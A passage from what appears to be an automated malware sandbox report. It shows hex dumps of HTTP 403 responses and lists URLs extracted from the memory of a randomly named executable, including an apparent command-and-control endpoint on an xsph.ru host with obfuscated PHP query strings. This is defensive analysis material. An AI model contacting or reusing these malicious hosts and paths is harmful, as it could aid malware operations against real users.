6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 27 Sep 2024 06:43:35 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 27 Sep 2024 06:43:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 27 Sep 2024 06:43:53 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Fri, 27 Sep 2024 06:43:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 64 66 62 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 6f 7a 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 3b 2d 6d 6f 7a 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 69 6e 68 65 72 69 74 3b 6d 61 78 2d 77 69 64 74 68 3a 31 30 33 32 70 78 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 2d 6d 6f 7a 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 68 6f 72 69 7a 6f 6e 74 61 6c 3b 2d 6d 6f 7a 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 72 6f 77 3b 70 61 64 64 69 6e 67 3a 31 32 38 70 78 20 31 36 70 78 20 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 2d 6d 6f 7a 2d 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 63 61 6c 63 28 31 30 30 76 68 20 2d 20 31 32 38 70 78 29 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 63 6f 6e 74 65 6e 74 2d 62 6f 78 3b 62 6f 78 2d 73 69 7a 69
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.000000000307E000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000003059000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002F0D000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BEC000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.000000000313D000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.000000000310C000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.00000000030D7000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002FD9000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.000000000300F000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002FE4000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002F15000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002EE8000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003542000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003511000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1025223.xsph.ru
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003992000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1025223.xsph.ru/
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002EE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1025223.xsph.ru/d2e9d328.php?4acnMu3AiXjx7W4g=3wYdYqeqdVKTtaR4nW1a6PqTDmuH&XER5ENhWA=u76tZtr
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.000000000313D000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.00000000030D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1025223.xsph.ru/d2e9d328.php?TIhQfugI6qD9EGxcg3vTGUCLj6Y4Mi=5F3FLPT&2132410dd3c9d0ed40475469
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BEC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1025223.xsph.ru/d2e9d328.php?UJm7tEakW4DhlWwkna0hC=XFOwV2Tzt0&2132410dd3c9d0ed40475469f1dad0
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000003059000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1705381265.000000001BE4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://a1025223.xsph.ru/d2e9d328.php?YyNDR3TlOsqwkTKEyKWhRDLsjJJiW2r=BuUiy1r4iQfw1ZDtv1bvF&2132410dd
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003542000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.00000000034E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1025223.xsph.ru/d2e9d328.php?jMy2l9ofssClq5c0mtSKS5eB=aT8&ypKouMyQik=1N3uV2MDdEMLW&bosx0LppM
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2194422179.000000001C143000.00000004.00000020.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.000000000300F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://a1025223.xsph.ru/d2e9d328.php?uqxA755t6aUOPvdhb47UTU5K8HjMT=5kNUaRG0xjgAsz&2132410dd3c9d0ed40
            Source: SurrogateContainerAgent.exe, 00000005.00000002.1476955180.00000000038A9000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002EB8000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002C37000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002AD1000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.0000000003413000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002AF0000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003826000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000002A.00000002.2468285261.0000000003401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B70000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000014.00000002.1556039207.0000000002B49000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BC6000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001C.00000002.1772787740.0000000002BFB000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.000000000313D000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 0000001F.00000002.1900712183.0000000003119000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.000000000300F000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000024.00000002.2142896605.0000000002FE4000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BF5000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 00000027.00000002.2287171335.0000000002BD2000.00000004.00000800.00020000.00000000.sdmp, zTShuhFeOCWKXCInUCSTgJmE.exe, 